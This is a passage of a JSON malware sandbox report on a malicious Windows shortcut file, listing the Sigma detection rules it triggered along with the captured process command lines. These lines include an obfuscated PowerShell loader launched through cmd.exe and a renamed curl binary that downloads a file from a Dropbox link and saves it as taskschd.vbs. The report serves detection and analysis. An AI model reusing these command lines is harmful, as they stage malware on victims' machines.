"CommandLine": "C:\\Windows\\system32\\cmd.exe /c mode 15,1&for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\*rshell.exe /s /b /od) do call %a $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef [TRUNCATED]",
"Image": "C:\\Windows\\system32\\cmd.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "de683a6054ff03b9c12e58c842648f759cfcf797f91dc01078d285e8f3f8e856",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Copy From or To System Directory",
"rule_description": "Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.\n",
"rule_author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c mode 15,1&for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\*rshell.exe /s /b /od) do call %a $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef [TRUNCATED]",
"Image": "C:\\Windows\\system32\\cmd.exe",
"EventID": "1"
}
},
{
"values": {
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\shortcut.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"Description": "Windows Command Processor",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qnMlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qnMJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep3dZ]8R}zmWpY6LIQ3hZ{oL}7nep3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OXldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep3dZ]8NVo:MJQye[DPWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW3]MWHX: [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7 [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "e90bd630609a035372a71ff4471ee3d2e99ffb6464b8370ef394ea1a4d2c36f9",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Renamed CURL.EXE Execution",
"rule_description": "Detects the execution of a renamed \"CURL.exe\" binary based on the PE metadata fields",
"rule_author": "X__Junior (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\",
"OriginalFileName": "curl.exe",
"Hashes": "MD5=1C3645EBDDBE2DA6A32A5F9FB43A3C23,SHA256=0BA1C44D0EE5B34B45B449074CDA51624150DC16B3B3C38251DF6C052ADBA205,IMPHASH=2447B641444AC52A5B600C8801CE3532",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "TMP0392.exe -k -L -o taskschd.vbs \"https://www.dropbox.com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7est=ip1rnvm2dl=0\" ",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\TMP0392.exe",
"Company": "curl, https://curl.haxx.se/"
}
},
{
"values": {
"Product": "The curl executable",
"CurrentDirectory": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\",
"OriginalFileName": "curl.exe",
"Hashes": "MD5=4329254E74AD91D047E3CEDCC7C138C3,SHA256=126217CB9E37D9CF3B254E13A4E2B257FFFFAE54728892D00E868D56DE726071,IMPHASH=1FAE21CBD5A980A07170C74DE0A3B416",
"Description": "The curl executable",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "TMP0392.exe -k -L -o taskschd.vbs \"https://www.dropbox.com/scl/fi/0m6mp6c53dnj6eird0kpd/setting.ini?rlkey=s5ef1qsa9krhxcqkn3cthrs7est=ip1rnvm2dl=0\" ",
"FileVersion": "7.55.1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Users\\Bruno\\AppData\\Roaming\\Microsoft\\MMC\\TMP0392.exe",
"Company": "curl, https://curl.haxx.se/"
}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking for a \"powershell\" process whose parent is something other than a user GUI process such as \"explorer.exe\" (for example cmd.exe, as in the matches below).",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "SHA1=3D6861E137699ADD6E1DB51E2F9D96A9FC4F122D,MD5=1089F6E6C6C219009F75C637ED302F99,SHA256=5A1D9329C862C908B050896FEFA49628D00A914EE2155CEFCAA7704BD1A5E2C8,IMPHASH=FF24CEF596AA4AA9D65391184A89D008",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoE [TRUNCATED]",
"FileVersion": "10.0.22621.2361 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep<3dZ]8NVo:MJQye[D<PWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW [TRUNCATED]",
"Image": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qnMlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qnMJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep3dZ]8R}zmWpY6LIQ3hZ{oL}7nep3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OXldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep3dZ]8NVo:MJQye[DPWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW3]MWHX: [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=C32CA4ACFCC635EC1EA6ED8A34DF5FAC,SHA256=73A3C4AEF5DE385875339FC2EB7E58A9E8A47B6161BDC6436BF78A763537BE70,IMPHASH=194427A488ED1DD0A91731658B071667",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf [TRUNCATED]",
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qnMlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qnMJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep3dZ]8R}zmWpY6LIQ3hZ{oL}7nep3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OXldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep3dZ]8NVo:MJQye[DPWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW3]MWHX: [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "%WINDIR%\\syswow64\\windowspowershell\\v1.0\\powershell.exe",
"Image": "C:\\Windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "7752bbd4e940ef58081260cfa45b4ac6b149e2cecb836d79f5e61bfbdc237105",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "File And SubFolder Enumeration Via Dir Command",
"rule_description": "Detects usage of the \"dir\" command part of Windows CMD with the \"/S\" command line flag in order to enumerate files in a specified directory and all subdirectories.\n",
"rule_author": "frack113",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL} [TRUNCATED]",
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c mode 15,1&for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\*rshell.exe /s /b /od) do call %a $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef [TRUNCATED]",
"Image": "C:\\Windows\\system32\\cmd.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od",
"Image": "C:\\Windows\\system32\\cmd.exe",
"EventID": "1"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"Description": "Windows Command Processor",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\shortcut.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "low",
"rule_id": "ec63f6d5ea6cf1a23c7c491b28d6b350219d23a95ea95516ce0256730fb7912c",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Local Accounts Discovery",
"rule_description": "Local accounts, System Owner/User discovery using operating system utilities",
"rule_author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community",
"match_context": [
{
"values": {
"Hashes": "SHA1=13E9BB7E85FF9B08C26A440412E5CD5D296C4D35,MD5=5A6BE4D2519515241D0C133A26CF62C0,SHA256=423E0E810A69AACEBA0E5670E58AFF898CF0EBFFAB99CCB46EBB3464C3D2FACB,IMPHASH=D73E39DAB3C8B57AA408073D01254964",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"FileVersion": "10.0.22621.1635 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\Explorer.EXE",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\explorer.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c mode 15,1&for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\*rshell.exe /s /b /od) do call %a $se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qn<Mlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qn<MJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep<3dZ]8R}zmWpY6LIQ3hZ{oL}7nep<3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OX<ldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef [TRUNCATED]",
"Image": "C:\\Windows\\system32\\cmd.exe",
"EventID": "1"
}
},
{
"values": {
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentCommandLine": "\"C:\\Windows\\sysnative\\WindowsPowerShell\\v1.0\\powershell.exe\" Start-Process -FilePath \"C:\\Users\\Bruno\\Desktop\\shortcut.lnk\"",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1&for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[D<PGvnf5kyfKEsepf<M5{oepg3dFf:SFQGW34O [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=D0FCE3AFA6AA1D58CE9FA336CC2B675B,SHA256=4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22,IMPHASH=392B4D61B1D1DADC1F06444DF258188A",
"Description": "Windows Command Processor",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7nf6Yx]JI8SXgogF4Pe5QkgJoyemv;L3QSWXvmSlUxe6Us]qnMlkq\\53jNpY3OXQrdZ{nNlnjNl8vepv:SFQR][fjX6U8eJXmSlUxe6Us]qnMJ8ygJoph[{6dJY|]V4y\\pso\\6U:MI;xMKQre6EzdZ8qLF4ofVDzhGD|QmEJRK3:MJ4yepwohW3nep3dZ]8R}zmWpY6LIQ3hZ{oL}7nep3dZ]8SVUxe6Us]qo;X5Yv]ZQ3OXldpYmgFDwU[kz\\Z8nXKMyfJY|gKnjWpIw]Wv;L3oRVYUML}8s]lkef6U|dZ8q[Wr9V[QRgZ{vW6MIe[E3hVjnep3dZ]8NVo:MJQye[DPWv;L3oRVYUML}7nf6Yx]JI8SVUoeq\\9YYQIXoEVW3]MWHX: [TRUNCATED]",
"CommandLine": "\"C:\\Windows\\system32\\cmd.exe\" /c mode 15,1for /f \"tokens=*\" %%a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\*rshell.exe /s /b /od') do call %%a \"$se='MJQye[DPGvnf5kyfKEsepfM5{oepg3dFf:SFQGW34OL}7 [TRUNCATED]",
"EventID": "1",
"ParentImage": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
"IntegrityLevel": "High",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"Company": "Microsoft Corporation"
}
}
]
}
],
"type_tag": "lnk",
"magika": "LNK",
"type_description": "Windows shortcut",
"crowdsourced_ids_stats": {
"high": 0,
"medium": 0,
"low": 0,
"info": 1
},
"md5": "ba8e682a72c6a3e634c070f0fb057bf5",
"total_votes": {
"harmless": 0,
"malicious": 1
},
"sigma_analysis_stats": {
"critical": 0,
